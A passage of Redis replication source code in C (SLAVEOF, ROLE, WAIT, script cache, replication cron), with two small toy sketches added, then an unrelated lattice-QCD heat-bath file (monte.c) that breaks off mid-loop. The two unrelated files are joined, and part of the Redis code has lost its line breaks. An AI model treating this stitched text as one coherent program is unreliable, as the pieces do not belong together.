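     * readable event installed below fires readSyncBulkPayload() for every
     * chunk received from the master.)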
     */
    if (aeCreateFileEvent(server.el,fd, AE_READABLE,readSyncBulkPayload,NULL)
            == AE_ERR)
    {
        serverLog(LL_WARNING,
            "Can't create readable event for SYNC: %s (fd=%d)",
            strerror(errno),fd);
        goto error;
    }

    server.repl_state = REPL_STATE_TRANSFER;
    server.repl_transfer_size = -1;
    server.repl_transfer_read = 0;
    server.repl_transfer_last_fsync_off = 0;
    server.repl_transfer_fd = dfd;
    server.repl_transfer_lastio = server.unixtime;
    server.repl_transfer_tmpfile = zstrdup(tmpfile);
    return;

error:
    aeDeleteFileEvent(server.el,fd,AE_READABLE|AE_WRITABLE);
    if (dfd != -1) close(dfd);
    close(fd);
    server.repl_transfer_s = -1;
    server.repl_state = REPL_STATE_CONNECT;
    return;

write_error: /* Handle sendSynchronousCommand(SYNC_CMD_WRITE) errors. */
    serverLog(LL_WARNING,"Sending command to master in replication handshake: %s", err);
    sdsfree(err);
    goto error;
}

int connectWithMaster(void) {
    int fd;

    fd = anetTcpNonBlockBestEffortBindConnect(NULL,
        server.masterhost,server.masterport,NET_FIRST_BIND_ADDR);
    if (fd == -1) {
        serverLog(LL_WARNING,"Unable to connect to MASTER: %s",
            strerror(errno));
        return C_ERR;
    }

    if (aeCreateFileEvent(server.el,fd,AE_READABLE|AE_WRITABLE,syncWithMaster,NULL) ==
            AE_ERR)
    {
        close(fd);
        serverLog(LL_WARNING,"Can't create readable event for SYNC");
        return C_ERR;
    }

    server.repl_transfer_lastio = server.unixtime;
    server.repl_transfer_s = fd;
    server.repl_state = REPL_STATE_CONNECTING;
    return C_OK;
}

/* This function can be called when a non blocking connection is currently
 * in progress to undo it.
 * Never call this function directly, use cancelReplicationHandshake()
 * instead. */
void undoConnectWithMaster(void) {
    int fd = server.repl_transfer_s;

    aeDeleteFileEvent(server.el,fd,AE_READABLE|AE_WRITABLE);
    close(fd);
    server.repl_transfer_s = -1;
}

/* Abort the async download of the bulk dataset while SYNC-ing with master.
 * Never call this function directly, use cancelReplicationHandshake()
 * instead. */
void replicationAbortSyncTransfer(void) {
    serverAssert(server.repl_state == REPL_STATE_TRANSFER);
    undoConnectWithMaster();
    close(server.repl_transfer_fd);
    unlink(server.repl_transfer_tmpfile);
    zfree(server.repl_transfer_tmpfile);
}

/* This function aborts a non blocking replication attempt if there is one
 * in progress, by canceling the non-blocking connect attempt or
 * the initial bulk transfer.
 *
 * If there was a replication handshake in progress 1 is returned and
 * the replication state (server.repl_state) is set to REPL_STATE_CONNECT.
 *
 * Otherwise zero is returned and no operation is performed at all. */
int cancelReplicationHandshake(void) {
    if (server.repl_state == REPL_STATE_TRANSFER) {
        replicationAbortSyncTransfer();
        server.repl_state = REPL_STATE_CONNECT;
    } else if (server.repl_state == REPL_STATE_CONNECTING ||
               slaveIsInHandshakeState())
    {
        undoConnectWithMaster();
        server.repl_state = REPL_STATE_CONNECT;
    } else {
        return 0;
    }
    return 1;
}

/* Set replication to the specified master address and port. */
void replicationSetMaster(char *ip, int port) {
    int was_master = server.masterhost == NULL;

    sdsfree(server.masterhost);
    server.masterhost = sdsnew(ip);
    server.masterport = port;
    if (server.master) {
        freeClient(server.master);
    }
    disconnectAllBlockedClients(); /* Clients blocked in master, now slave. */

    /* Force our slaves to resync with us as well. They may hopefully be able
     * to partially resync with us, but in any case we notify them of the
     * replid change.
     */
    disconnectSlaves();
    cancelReplicationHandshake();
    /* Before destroying our master state, create a cached master using
     * our own parameters, to later PSYNC with the new master. */
    if (was_master) replicationCacheMasterUsingMyself();
    server.repl_state = REPL_STATE_CONNECT;
    server.repl_down_since = 0;
}

/* Cancel replication, setting the instance as a master itself. */
void replicationUnsetMaster(void) {
    if (server.masterhost == NULL) return; /* Nothing to do. */
    sdsfree(server.masterhost);
    server.masterhost = NULL;
    /* When a slave is turned into a master, the current replication ID
     * (that was inherited from the master at synchronization time) is
     * used as secondary ID up to the current offset, and a new replication
     * ID is created to continue with a new replication history. */
    shiftReplicationId();
    if (server.master) freeClient(server.master);
    replicationDiscardCachedMaster();
    cancelReplicationHandshake();
    /* Disconnecting all the slaves is required: we need to inform slaves
     * of the replication ID change (see shiftReplicationId() call). However
     * the slaves will be able to partially resync with us, so it will be
     * a very fast reconnection. */
    disconnectSlaves();
    server.repl_state = REPL_STATE_NONE;

    /* We need to make sure the new master will start the replication stream
     * with a SELECT statement. This is forced after a full resync, but
     * with PSYNC version 2, there is no need for a full resync after a
     * master switch. */
    server.slaveseldb = -1;
}

/* This function is called when the slave loses the connection with the
 * master in an unexpected way. */
void replicationHandleMasterDisconnection(void) {
    server.master = NULL;
    server.repl_state = REPL_STATE_CONNECT;
    server.repl_down_since = server.unixtime;
    /* We lost connection with our master, don't disconnect slaves yet,
     * maybe we'll be able to PSYNC with our master later. We'll disconnect
     * the slaves only if we'll have to do a full resync with our master. */
}

void slaveofCommand(client *c) {
    /* SLAVEOF is not allowed in cluster mode as replication is automatically
     * configured using the current address of the master node. */
    if (server.cluster_enabled) {
        addReplyError(c,"SLAVEOF not allowed in cluster mode.");
        return;
    }

    /* The special host/port combination "NO" "ONE" turns the instance
     * into a master. Otherwise the new master address is set. */
    if (!strcasecmp(c->argv[1]->ptr,"no") &&
        !strcasecmp(c->argv[2]->ptr,"one")) {
        if (server.masterhost) {
            replicationUnsetMaster();
            sds client = catClientInfoString(sdsempty(),c);
            serverLog(LL_NOTICE,"MASTER MODE enabled (user request from '%s')",
                client);
            sdsfree(client);
        }
    } else {
        long port;

        if ((getLongFromObjectOrReply(c, c->argv[2], &port, NULL) != C_OK))
            return;

        /* Check if we are already attached to the specified master */
        if (server.masterhost && !strcasecmp(server.masterhost,c->argv[1]->ptr)
            && server.masterport == port) {
            serverLog(LL_NOTICE,"SLAVE OF would result into synchronization with the master we are already connected with. No operation performed.");
            addReplySds(c,sdsnew("+OK Already connected to specified master\r\n"));
            return;
        }
        /* There was no previous master or the user specified a different one,
         * we can continue.
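         *
         * (For example, "SLAVEOF 127.0.0.1 6380" issued from redis-cli ends
         * up here, with address and port purely illustrative:
         * replicationSetMaster() below stores the address and sets the
         * REPL_STATE_CONNECT state, and the replication cron then initiates
         * the actual handshake.)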
         */
        replicationSetMaster(c->argv[1]->ptr, port);
        sds client = catClientInfoString(sdsempty(),c);
        serverLog(LL_NOTICE,"SLAVE OF %s:%d enabled (user request from '%s')",
            server.masterhost, server.masterport, client);
        sdsfree(client);
    }
    addReply(c,shared.ok);
}

/* ROLE command: provide information about the role of the instance
 * (master or slave) and additional information related to replication
 * in an easy to process format. */
void roleCommand(client *c) {
    if (server.masterhost == NULL) {
        listIter li;
        listNode *ln;
        void *mbcount;
        int slaves = 0;

        addReplyMultiBulkLen(c,3);
        addReplyBulkCBuffer(c,"master",6);
        addReplyLongLong(c,server.master_repl_offset);
        mbcount = addDeferredMultiBulkLength(c);
        listRewind(server.slaves,&li);
        while((ln = listNext(&li))) {
            client *slave = ln->value;
            char ip[NET_IP_STR_LEN], *slaveip = slave->slave_ip;

            if (slaveip[0] == '\0') {
                if (anetPeerToString(slave->fd,ip,sizeof(ip),NULL) == -1)
                    continue;
                slaveip = ip;
            }
            if (slave->replstate != SLAVE_STATE_ONLINE) continue;
            addReplyMultiBulkLen(c,3);
            addReplyBulkCString(c,slaveip);
            addReplyBulkLongLong(c,slave->slave_listening_port);
            addReplyBulkLongLong(c,slave->repl_ack_off);
            slaves++;
        }
        setDeferredMultiBulkLength(c,mbcount,slaves);
    } else {
        char *slavestate = NULL;

        addReplyMultiBulkLen(c,5);
        addReplyBulkCBuffer(c,"slave",5);
        addReplyBulkCString(c,server.masterhost);
        addReplyLongLong(c,server.masterport);
        if (slaveIsInHandshakeState()) {
            slavestate = "handshake";
        } else {
            switch(server.repl_state) {
            case REPL_STATE_NONE: slavestate = "none"; break;
            case REPL_STATE_CONNECT: slavestate = "connect"; break;
            case REPL_STATE_CONNECTING: slavestate = "connecting"; break;
            case REPL_STATE_TRANSFER: slavestate = "sync"; break;
            case REPL_STATE_CONNECTED: slavestate = "connected"; break;
            default: slavestate = "unknown"; break;
            }
        }
        addReplyBulkCString(c,slavestate);
        addReplyLongLong(c,server.master ? server.master->reploff : -1);
    }
}

/* Send a REPLCONF ACK command to the master to inform it about the current
 * processed offset. If we are not connected with a master, the command has
 * no effects. */
void replicationSendAck(void) {
    client *c = server.master;

    if (c != NULL) {
        c->flags |= CLIENT_MASTER_FORCE_REPLY;
        addReplyMultiBulkLen(c,3);
        addReplyBulkCString(c,"REPLCONF");
        addReplyBulkCString(c,"ACK");
        addReplyBulkLongLong(c,c->reploff);
        c->flags &= ~CLIENT_MASTER_FORCE_REPLY;
    }
}

/* ---------------------- MASTER CACHING FOR PSYNC -------------------------- */

/* In order to implement partial synchronization we need to be able to cache
 * our master's client structure after a transient disconnection.
 * It is cached into server.cached_master and flushed away using the following
 * functions. */

/* This function is called by freeClient() in order to cache the master
 * client structure instead of destroying it. freeClient() will return
 * ASAP after this function returns, so every action needed to avoid problems
 * with a client that is really "suspended" has to be done by this function.
 *
 * The other functions that will deal with the cached master are:
 *
 * replicationDiscardCachedMaster() that will make sure to kill the client
 * as for some reason we don't want to use it in the future.
 *
 * replicationResurrectCachedMaster() that is used after a successful PSYNC
 * handshake in order to reactivate the cached master. */
void replicationCacheMaster(client *c) {
    serverAssert(server.master != NULL && server.cached_master == NULL);
    serverLog(LL_NOTICE,"Caching the disconnected master state.");

    /* Unlink the client from the server structures.
     */
    unlinkClient(c);

    /* Reset the master client so that it's ready to accept new commands:
     * we want to discard the non processed query buffers and the non
     * processed offsets, including pending transactions, already populated
     * arguments, and pending outputs to the master. */
    sdsclear(server.master->querybuf);
    sdsclear(server.master->pending_querybuf);
    server.master->read_reploff = server.master->reploff;
    if (c->flags & CLIENT_MULTI) discardTransaction(c);
    listEmpty(c->reply);
    c->bufpos = 0;
    resetClient(c);

    /* Save the master. Server.master will be set to null later by
     * replicationHandleMasterDisconnection(). */
    server.cached_master = server.master;

    /* Invalidate the Peer ID cache. */
    if (c->peerid) {
        sdsfree(c->peerid);
        c->peerid = NULL;
    }

    /* Caching the master happens instead of the actual freeClient() call,
     * so make sure to adjust the replication state. This function will
     * also set server.master to NULL. */
    replicationHandleMasterDisconnection();
}

/* This function is called when a master is turned into a slave, in order to
 * create from scratch a cached master for the new client, that will allow
 * to PSYNC with the slave that was promoted as the new master after a
 * failover.
 *
 * Assuming this instance was previously the master instance of the new
 * master, the new master will accept its replication ID, and potentially
 * also the current offset if no data was lost during the failover. So we
 * use our current replication ID and offset in order to synthesize a
 * cached master. */
void replicationCacheMasterUsingMyself(void) {
    /* The master client we create can be set to any DBID, because
     * the new master will start its replication stream with SELECT. */
    server.master_initial_offset = server.master_repl_offset;
    replicationCreateMasterClient(-1,-1);

    /* Use our own ID / offset. */
    memcpy(server.master->replid, server.replid, sizeof(server.replid));

    /* Set as cached master. */
    unlinkClient(server.master);
    server.cached_master = server.master;
    server.master = NULL;
    serverLog(LL_NOTICE,"Before turning into a slave, using my master parameters to synthesize a cached master: I may be able to synchronize with the new master with just a partial transfer.");
}

/* Free a cached master, called when there are no longer the conditions for
 * a partial resync on reconnection. */
void replicationDiscardCachedMaster(void) {
    if (server.cached_master == NULL) return;

    serverLog(LL_NOTICE,"Discarding previously cached master state.");
    server.cached_master->flags &= ~CLIENT_MASTER;
    freeClient(server.cached_master);
    server.cached_master = NULL;
}

/* Turn the cached master into the current master, using the file descriptor
 * passed as argument as the socket for the new master.
 *
 * This function is called when we successfully setup a partial
 * resynchronization, so the stream of data that we'll receive will start
 * from where this master left off. */
void replicationResurrectCachedMaster(int newfd) {
    server.master = server.cached_master;
    server.cached_master = NULL;
    server.master->fd = newfd;
    server.master->flags &= ~(CLIENT_CLOSE_AFTER_REPLY|CLIENT_CLOSE_ASAP);
    server.master->authenticated = 1;
    server.master->lastinteraction = server.unixtime;
    server.repl_state = REPL_STATE_CONNECTED;

    /* Re-add to the list of clients. */
    listAddNodeTail(server.clients,server.master);
    if (aeCreateFileEvent(server.el, newfd, AE_READABLE,
                          readQueryFromClient, server.master)) {
        serverLog(LL_WARNING,"Error resurrecting the cached master, impossible to add the readable handler: %s", strerror(errno));
        freeClientAsync(server.master); /* Close ASAP. */
    }

    /* We may also need to install the write handler as well if there is
     * pending data in the write buffers. */
    if (clientHasPendingReplies(server.master)) {
        if (aeCreateFileEvent(server.el, newfd, AE_WRITABLE,
                          sendReplyToClient, server.master)) {
            serverLog(LL_WARNING,"Error resurrecting the cached master, impossible to add the writable handler: %s", strerror(errno));
            freeClientAsync(server.master); /* Close ASAP. */
        }
    }
}

/* ------------------------- MIN-SLAVES-TO-WRITE --------------------------- */

/* This function counts the number of slaves with lag <= min-slaves-max-lag.
 * If the option is active, the server will prevent writes if there are not
 * enough connected slaves with the specified lag (or less). */
void refreshGoodSlavesCount(void) {
    listIter li;
    listNode *ln;
    int good = 0;

    if (!server.repl_min_slaves_to_write ||
        !server.repl_min_slaves_max_lag) return;

    listRewind(server.slaves,&li);
    while((ln = listNext(&li))) {
        client *slave = ln->value;
        time_t lag = server.unixtime - slave->repl_ack_time;

        if (slave->replstate == SLAVE_STATE_ONLINE &&
            lag <= server.repl_min_slaves_max_lag) good++;
    }
    server.repl_good_slaves_count = good;
}

/* ----------------------- REPLICATION SCRIPT CACHE --------------------------
 * The goal of this code is to keep track of scripts already sent to every
 * connected slave, in order to be able to replicate EVALSHA as it is without
 * translating it to EVAL every time it is possible.
 *
 * We use a capped collection implemented by a hash table for fast lookup
 * of scripts we can send as EVALSHA, plus a linked list that is used for
 * eviction of the oldest entry when the max number of items is reached.
 *
 * We don't care about taking a different cache for every different slave
 * since filling the cache again is not very costly. The goal of this code
 * is to avoid that the same big script is transmitted a big number of times
 * per second, wasting bandwidth and processor speed, but it is not a problem
 * if we need to rebuild the cache from scratch from time to time: every used
 * script will need to be transmitted a single time to reappear in the cache.
 *
 * This is how the system works:
 *
 * 1) Every time a new slave connects, we flush the whole script cache.
 * 2) We only send as EVALSHA what was sent to the master as EVALSHA, without
 *    trying to convert EVAL into EVALSHA specifically for slaves.
 * 3) Every time we transmit a script as EVAL to the slaves, we also add the
 *    corresponding SHA1 of the script into the cache as we are sure every
 *    slave knows about the script starting from now.
 * 4) On SCRIPT FLUSH command, we replicate the command to all the slaves
 *    and at the same time flush the script cache.
 * 5) When the last slave disconnects, flush the cache.
 * 6) We handle SCRIPT LOAD as well since that's how scripts are loaded
 *    in the master sometimes. */

/* Initialize the script cache, only called at startup. */
void replicationScriptCacheInit(void) {
    server.repl_scriptcache_size = 10000;
    server.repl_scriptcache_dict = dictCreate(&replScriptCacheDictType,NULL);
    server.repl_scriptcache_fifo = listCreate();
}

/* Empty the script cache. Should be called every time we are no longer sure
 * that every slave knows about all the scripts in our set, or when the
 * current AOF "context" is no longer aware of the script. In general we
 * should flush the cache:
 *
 * 1) Every time a new slave reconnects to this master and performs a
 *    full SYNC (PSYNC does not require flushing).
 * 2) Every time an AOF rewrite is performed.
* 3) Every time we are left without slaves at all, and AOF is off, in order * to reclaim otherwise unused memory. */ void replicationScriptCacheFlush(void) { dictEmpty(server.repl_scriptcache_dict,NULL); listRelease(server.repl_scriptcache_fifo); server.repl_scriptcache_fifo = listCreate(); } /* Add an entry into the script cache; if we reach the max number of entries * the oldest is removed from the list. */ void replicationScriptCacheAdd(sds sha1) { int retval; sds key = sdsdup(sha1); /* Evict oldest. */ if (listLength(server.repl_scriptcache_fifo) == server.repl_scriptcache_size) { listNode *ln = listLast(server.repl_scriptcache_fifo); sds oldest = listNodeValue(ln); retval = dictDelete(server.repl_scriptcache_dict,oldest); serverAssert(retval == DICT_OK); listDelNode(server.repl_scriptcache_fifo,ln); } /* Add current. */ retval = dictAdd(server.repl_scriptcache_dict,key,NULL); listAddNodeHead(server.repl_scriptcache_fifo,key); serverAssert(retval == DICT_OK); } /* Returns non-zero if the specified entry exists inside the cache, that is, * if all the slaves are aware of this script SHA1. */ int replicationScriptCacheExists(sds sha1) { return dictFind(server.repl_scriptcache_dict,sha1) != NULL; } /* ----------------------- SYNCHRONOUS REPLICATION -------------------------- * Redis synchronous replication design can be summarized in points: * * - Redis masters have a global replication offset, used by PSYNC. * - The master increments the offset every time new commands are sent to slaves. * - Slaves ping back masters with the offset processed so far. * * So synchronous replication adds a new WAIT command in the form: * * WAIT <num_replicas> <milliseconds_timeout> * * That returns the number of replicas that processed the query when * we finally have at least num_replicas, or when the timeout was * reached. * * The command is implemented in this way: * * - Every time a client processes a command, we remember the replication * offset after sending that command to the slaves. * - When WAIT is called, we ask slaves to send an acknowledgement ASAP. * The client is blocked at the same time (see blocked.c). * - Once we receive enough ACKs for a given offset or when the timeout * is reached, the WAIT command is unblocked and the reply sent to the * client. */ /* This just sets a flag so that we broadcast a REPLCONF GETACK command * to all the slaves in the beforeSleep() function. Note that this way * we "group" all the clients that want to wait for synchronous replication * in a given event loop iteration, and send a single GETACK for them all. */ void replicationRequestAckFromSlaves(void) { server.get_ack_from_slaves = 1; } /* Return the number of slaves that already acknowledged the specified * replication offset. */ int replicationCountAcksByOffset(long long offset) { listIter li; listNode *ln; int count = 0; listRewind(server.slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; if (slave->replstate != SLAVE_STATE_ONLINE) continue; if (slave->repl_ack_off >= offset) count++; } return count; } /* WAIT for N replicas to acknowledge the processing of our latest * write command (and all the previous commands). */ void waitCommand(client *c) { mstime_t timeout; long numreplicas, ackreplicas; long long offset = c->woff; if (server.masterhost) { addReplyError(c,"WAIT cannot be used with slave instances. 
Please also note that since Redis 4.0 if a slave is configured to be writable (which is not the default) writes to slaves are just local and are not propagated."); return; } /* Argument parsing. */ if (getLongFromObjectOrReply(c,c->argv[1],&numreplicas,NULL) != C_OK) return; if (getTimeoutFromObjectOrReply(c,c->argv[2],&timeout,UNIT_MILLISECONDS) != C_OK) return; /* First try without blocking at all. */ ackreplicas = replicationCountAcksByOffset(c->woff); if (ackreplicas >= numreplicas || c->flags & CLIENT_MULTI) { addReplyLongLong(c,ackreplicas); return; } /* Otherwise block the client and put it into our list of clients * waiting for ack from slaves. */ c->bpop.timeout = timeout; c->bpop.reploffset = offset; c->bpop.numreplicas = numreplicas; listAddNodeTail(server.clients_waiting_acks,c); blockClient(c,BLOCKED_WAIT); /* Make sure that the server will send an ACK request to all the slaves * before returning to the event loop. */ replicationRequestAckFromSlaves(); } /* This is called by unblockClient() to perform the blocking op type * specific cleanup. We just remove the client from the list of clients * waiting for replica acks. Never call it directly, call unblockClient() * instead. */ void unblockClientWaitingReplicas(client *c) { listNode *ln = listSearchKey(server.clients_waiting_acks,c); serverAssert(ln != NULL); listDelNode(server.clients_waiting_acks,ln); } /* Check if there are clients blocked in WAIT that can be unblocked since * we received enough ACKs from slaves. */ void processClientsWaitingReplicas(void) { long long last_offset = 0; int last_numreplicas = 0; listIter li; listNode *ln; listRewind(server.clients_waiting_acks,&li); while((ln = listNext(&li))) { client *c = ln->value; /* Every time we find a client that is satisfied for a given * offset and number of replicas, we remember it so the next client * may be unblocked without calling replicationCountAcksByOffset() * if the requested offset / replicas were equal or less. */ if (last_offset && last_offset > c->bpop.reploffset && last_numreplicas > c->bpop.numreplicas) { unblockClient(c); addReplyLongLong(c,last_numreplicas); } else { int numreplicas = replicationCountAcksByOffset(c->bpop.reploffset); if (numreplicas >= c->bpop.numreplicas) { last_offset = c->bpop.reploffset; last_numreplicas = numreplicas; unblockClient(c); addReplyLongLong(c,numreplicas); } } } } /* Return the slave replication offset for this instance, that is * the offset for which we already processed the master replication stream. */ long long replicationGetSlaveOffset(void) { long long offset = 0; if (server.masterhost != NULL) { if (server.master) { offset = server.master->reploff; } else if (server.cached_master) { offset = server.cached_master->reploff; } } /* offset may be -1 when the master does not support it at all, however * this function is designed to return an offset that can express the * amount of data processed by the master, so we return a positive * integer. */ if (offset < 0) offset = 0; return offset; } /* --------------------------- REPLICATION CRON ---------------------------- */ /* Replication cron function, called 1 time per second. */ void replicationCron(void) { static long long replication_cron_loops = 0; /* Non blocking connection timeout? 
*/ if (server.masterhost && (server.repl_state == REPL_STATE_CONNECTING || slaveIsInHandshakeState()) && (time(NULL)-server.repl_transfer_lastio) > server.repl_timeout) { serverLog(LL_WARNING,"Timeout connecting to the MASTER..."); cancelReplicationHandshake(); } /* Bulk transfer I/O timeout? */ if (server.masterhost && server.repl_state == REPL_STATE_TRANSFER && (time(NULL)-server.repl_transfer_lastio) > server.repl_timeout) { serverLog(LL_WARNING,"Timeout receiving bulk data from MASTER... If the problem persists try to set the 'repl-timeout' parameter in redis.conf to a larger value."); cancelReplicationHandshake(); } /* Timed out master when we are an already connected slave? */ if (server.masterhost && server.repl_state == REPL_STATE_CONNECTED && (time(NULL)-server.master->lastinteraction) > server.repl_timeout) { serverLog(LL_WARNING,"MASTER timeout: no data nor PING received..."); freeClient(server.master); } /* Check if we should connect to a MASTER */ if (server.repl_state == REPL_STATE_CONNECT) { serverLog(LL_NOTICE,"Connecting to MASTER %s:%d", server.masterhost, server.masterport); if (connectWithMaster() == C_OK) { serverLog(LL_NOTICE,"MASTER <-> SLAVE sync started"); } } /* Send ACK to master from time to time. * Note that we do not send periodic acks to masters that don't * support PSYNC and replication offsets. */ if (server.masterhost && server.master && !(server.master->flags & CLIENT_PRE_PSYNC)) replicationSendAck(); /* If we have attached slaves, PING them from time to time. * So slaves can implement an explicit timeout to masters, and will * be able to detect a link disconnection even if the TCP connection * will not actually go down. */ listIter li; listNode *ln; robj *ping_argv[1]; /* First, send PING according to ping_slave_period. */ if ((replication_cron_loops % server.repl_ping_slave_period) == 0 && listLength(server.slaves)) { ping_argv[0] = createStringObject("PING",4); replicationFeedSlaves(server.slaves, server.slaveseldb, ping_argv, 1); decrRefCount(ping_argv[0]); } /* Second, send a newline to all the slaves in pre-synchronization * stage, that is, slaves waiting for the master to create the RDB file. * * Also send a newline to all the chained slaves we have, if we lost * connection from our master, to keep the slaves aware that their * master is online. This is needed since sub-slaves only receive proxied * data from top-level masters, so there is no explicit pinging in order * to avoid altering the replication offsets. These special out-of-band * pings (newlines) can be sent; they will have no effect on the offset. * * The newline will be ignored by the slave but will refresh the * last interaction timer preventing a timeout. In this case we ignore the * ping period and refresh the connection once per second since certain * timeouts are set at a few seconds (example: PSYNC response). */ listRewind(server.slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; int is_presync = (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START || (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_END && server.rdb_child_type != RDB_CHILD_TYPE_SOCKET)); if (is_presync) { if (write(slave->fd, "\n", 1) == -1) { /* Don't worry about socket errors, it's just a ping. */ } } } /* Disconnect timed-out slaves. 
*/ if (listLength(server.slaves)) { listIter li; listNode *ln; listRewind(server.slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; if (slave->replstate != SLAVE_STATE_ONLINE) continue; if (slave->flags & CLIENT_PRE_PSYNC) continue; if ((server.unixtime - slave->repl_ack_time) > server.repl_timeout) { serverLog(LL_WARNING, "Disconnecting timedout slave: %s", replicationGetSlaveName(slave)); freeClient(slave); } } } /* If this is a master without attached slaves and there is a replication * backlog active, in order to reclaim memory we can free it after some * (configured) time. Note that this cannot be done for slaves: slaves * without sub-slaves attached should still accumulate data into the * backlog, in order to reply to PSYNC queries if they are turned into * masters after a failover. */ if (listLength(server.slaves) == 0 && server.repl_backlog_time_limit && server.repl_backlog && server.masterhost == NULL) { time_t idle = server.unixtime - server.repl_no_slaves_since; if (idle > server.repl_backlog_time_limit) { freeReplicationBacklog(); serverLog(LL_NOTICE, "Replication backlog freed after %d seconds " "without connected slaves.", (int) server.repl_backlog_time_limit); } } /* If AOF is disabled and we no longer have attached slaves, we can * free our Replication Script Cache as there is no need to propagate * EVALSHA at all. */ if (listLength(server.slaves) == 0 && server.aof_state == AOF_OFF && listLength(server.repl_scriptcache_fifo) != 0) { replicationScriptCacheFlush(); } /* Start a BGSAVE good for replication if we have slaves in * WAIT_BGSAVE_START state. * * In case of diskless replication, we make sure to wait the specified * number of seconds (according to configuration) so that other slaves * have the time to arrive before we start streaming. */ if (server.rdb_child_pid == -1 && server.aof_child_pid == -1) { time_t idle, max_idle = 0; int slaves_waiting = 0; int mincapa = -1; listNode *ln; listIter li; listRewind(server.slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START) { idle = server.unixtime - slave->lastinteraction; if (idle > max_idle) max_idle = idle; slaves_waiting++; mincapa = (mincapa == -1) ? slave->slave_capa : (mincapa & slave->slave_capa); } } if (slaves_waiting && (!server.repl_diskless_sync || max_idle > server.repl_diskless_sync_delay)) { /* Start the BGSAVE. The called function may start a * BGSAVE with socket target or disk target depending on the * configuration and slaves capabilities. */ startBgsaveForReplication(mincapa); } } /* Refresh the number of slaves with lag <= min-slaves-max-lag. */ refreshGoodSlavesCount(); replication_cron_loops++; /* Incremented with frequency 1 HZ. */ }
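/* A toy model of the replication script cache policy described in the
 * comment block above: a capped set with oldest-first eviction. The real
 * code pairs a dict (O(1) SHA1 lookup) with a linked list (eviction
 * order); this standalone sketch uses a small ring of strings and linear
 * search purely to make the eviction behaviour visible. All names here
 * are hypothetical and only the policy mirrors the code above. */
#include <stdio.h>
#include <string.h>

#define CACHE_CAP 3

static char cache[CACHE_CAP][64];
static int cache_len = 0, cache_head = 0;

/* Non-zero if sha1 is already known to every slave (i.e. cached). */
static int cache_exists(const char *sha1)
{
    for (int i = 0; i < cache_len; i++)
        if (strcmp(cache[(cache_head + i) % CACHE_CAP], sha1) == 0)
            return 1;
    return 0;
}

/* Add sha1, evicting the oldest entry once the cap is reached. */
static void cache_add(const char *sha1)
{
    if (cache_len == CACHE_CAP) {
        cache_head = (cache_head + 1) % CACHE_CAP;  /* drop oldest */
        cache_len--;
    }
    strcpy(cache[(cache_head + cache_len) % CACHE_CAP], sha1);
    cache_len++;
}

int main(void)
{
    const char *scripts[] = {"sha-a", "sha-b", "sha-c", "sha-d"};
    for (int i = 0; i < 4; i++)
        cache_add(scripts[i]);          /* adding "sha-d" evicts "sha-a" */
    printf("sha-a cached: %d, sha-d cached: %d\n",
           cache_exists("sha-a"), cache_exists("sha-d"));
    return 0;
}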
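/* A minimal standalone sketch of the WAIT bookkeeping above: given each
 * replica's last acknowledged offset, count how many have processed at
 * least the target offset, exactly as replicationCountAcksByOffset()
 * walks server.slaves. The arrays and values below are made up for
 * illustration; only the counting and unblock condition are taken from
 * the code above. */
#include <stdio.h>

static int count_acks_by_offset(const long long *ack_offsets, int nreplicas,
                                long long target_offset)
{
    int count = 0;
    for (int i = 0; i < nreplicas; i++)
        if (ack_offsets[i] >= target_offset)
            count++;
    return count;
}

int main(void)
{
    long long acks[] = {1500, 900, 2000};  /* per-replica ack offsets */
    long long woff = 1000;                 /* offset of client's last write */
    int need = 2;                          /* WAIT <numreplicas> <timeout> */

    int got = count_acks_by_offset(acks, 3, woff);
    printf("%d of %d replicas acked offset %lld (need %d): %s\n",
           got, 3, woff, need, got >= need ? "unblock" : "keep waiting");
    return 0;
}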
988713.c
/************************** monte.c *******************************/ /* Kennedy-Pendleton quasi heat bath on SU(2) subgroups */ /* MIMD version 6 */ /* T. DeGrand March 1991 */ /* UMH: Combined with Schroedinger functional version, Jan 2000 */ #include "generic_pg_includes.h" #define Nc 3 void monte(int NumStp) { /* Do K-P quasi-heat bath by SU(2) subgroups */ int NumTrj,Nhit, index1, ina, inb,ii; int parity; Real xr1,xr2,xr3,xr4; Real a0=0,a1,a2,a3; Real v0,v1,v2,v3, vsq; Real h0,h1,h2,h3; Real r,r2,rho,z; Real al,d, xl,xd; int k,kp, cr, nacd, test; Real pi2, b3; register int dir,i; register site *st; su3_matrix action; su2_matrix h; Nhit = 3; pi2= 2.0*PI; b3=beta/3.0; /* fix bug by adding loop over NumTrj; before, 1 (and only 1) heat bath hit was done, regardless of NumStp */ for( NumTrj = 0 ; NumTrj < NumStp; NumTrj++) { /* fix bug by looping over odd AND even parity */ for(parity=ODD;parity<=EVEN;parity++) { FORALLUPDIR(dir) { /* compute the gauge force */ dsdu_qhb(dir,parity); /* now for the qhb updating */ for(index1=0;index1<Nhit;index1++) { kp=0; cr=0; /* pick out an SU(2) subgroup */ ina=(index1+1) % Nc; inb=(index1+2) % Nc; if(ina > inb){ ii=ina; ina=inb; inb=ii;} #ifdef SCHROED_FUN FORSOMEPARITY(i,st,parity) if(dir==TUP || st->t>0){ #else FORSOMEPARITY(i,st,parity){ #endif mult_su3_na( &(st->link[dir]), &(st->staple), &action ); /*decompose the action into SU(2) subgroups using Pauli matrix expansion */ /* The SU(2) hit matrix is represented as a0 + i * Sum j (sigma j * aj)*/ v0 = action.e[ina][ina].real + action.e[inb][inb].real; v3 = action.e[ina][ina].imag - action.e[inb][inb].imag; v1 = action.e[ina][inb].imag + action.e[inb][ina].imag; v2 = action.e[ina][inb].real - action.e[inb][ina].real; vsq = v0*v0 + v1*v1 + v2*v2 + v3*v3; z = sqrt((double)vsq ); /* Normalize u */ v0 = v0/z; v1 = v1/z; v2 = v2/z; v3 = v3/z; /* end norm check--trial SU(2) matrix is a0 + i a(j)sigma(j)*/ /* test if(this_node == 0)printf("v= %e %e %e %e\n",v0,v1,v2,v3); if(this_node == 0)printf("z= %e\n",z); */ /* now begin qhb */ /* get four random numbers (add a small increment to prevent taking log(0.)*/ xr1=myrand(&(st->site_prn)); xr1 = (log((double)(xr1+ 1.e-10))); xr2=myrand(&(st->site_prn)); xr2 = (log((double)(xr2+ 1.e-10))); xr3=myrand(&(st->site_prn)); xr4=myrand(&(st->site_prn)); 